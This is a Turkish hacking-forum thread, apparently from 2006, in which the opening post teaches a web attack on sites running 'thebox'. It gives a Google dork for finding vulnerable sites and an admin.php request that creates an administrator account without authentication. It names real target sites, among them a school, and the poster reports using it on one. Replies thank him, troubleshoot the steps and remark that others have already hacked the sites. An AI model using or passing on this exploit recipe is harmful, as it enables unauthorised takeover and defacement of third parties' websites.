Admin Paneline Girin Siteyi Hackleyin+bunu yapamayan webhack işini bıraksın :)) !!

Yeni üye
18 Tem 2006
21
2
google bunu taratın
inurl:thebox/thebox.php

karşınıza çıkan sitelerden birine girin browser adress çubugunda şöyle bir adres çıkacakhttp://www.martin-buber-oberschule.de/thebox/thebox.php

bunu sil şunu admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111
sonra sizi girişe yönlendirecek

USER:CLK-J35
PASWORD:111
bunları yaptıktan sonra admin paneli elinizde

mesela ben bunda denedim:

http://queerasfolk.wiredhub.org/theb...n.php?act=main

Arkadaşlar teşekkürü unutmayalım.Yorum yazan yazmayan teşekkürü unutmasın PLS..

crazyshark

Yeni üye
30 Haz 2006
11
0
Burki Msj Saçma Diosun Neye Göre?adam Güzelce Anlatmiş Ben Denedim Oluo Genelde Yabanci Sitelerde!

buraka

Yeni üye
4 Ağu 2006
6
0
Emeğe Saygı.
http://www.allaboutturkey.com/***/ata5.gif

Moderatör tarafında düzenlendi:

CyBer

Yeni üye
21 Şub 2006
19
0
o dediğin adresi ekliom sayfa görüntülenmio yani thebox fln onları silip dierini yazınca sayfa görüntülenemio

ThE-TRaPPeR

Yeni üye
13 Ağu 2006
2
0
CyBer' Alıntı:
( Click here if you are not automatically redirected....) admincp ye girip şifrei yazdıktan sonra böle bişey çıkıo:S

abi o eğer otomatik olarak yonlendirilmiyorsanız burayı tıklayınız demek...

ThE-TRaPPeR

Yeni üye
13 Ağu 2006
2
0
ya baya gec kalmısız millet hacklenecek siteleri hacklemiş dierleri zaten acığı kapatmıs uzuldum valla :(

musaxx

Yeni üye
13 Ağu 2006
1
0
kardess bunu herkes bişliyo zaten girdigin zaman hiç acık site olmuyo olanlarda heclenmis genede emegine saglık

bozkurtxtzs

Yeni üye
8 Ağu 2006
25
0
kardeş bunu yapamayanlar hackerlığı bıraksın diyorsunda bu açığı ilk gören hacker bütün sayfaları hacker onu düşünmedin mi?

mahir

Yeni üye
12 Tem 2006
2
0
wallhi arkadaşlar ben hack olayını bıraktım benim gözüm yukaıarda çünkü web sitelerini bloke etmek için bazı alt yapıya sahip olmak lazım.bunuda ben alt yapı derslerini alıyorum.hem kendigizi geliştireceksiniz hemede web sitelerini açıklarını göreceksiniiz.

Hidden Blue

Yeni üye
22 Ağu 2006
10
0
Paylaşım İçin Tşkler Hiç İhtimal Vermiyodum Ama Oldu Gerçekten Eline Sağlık

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.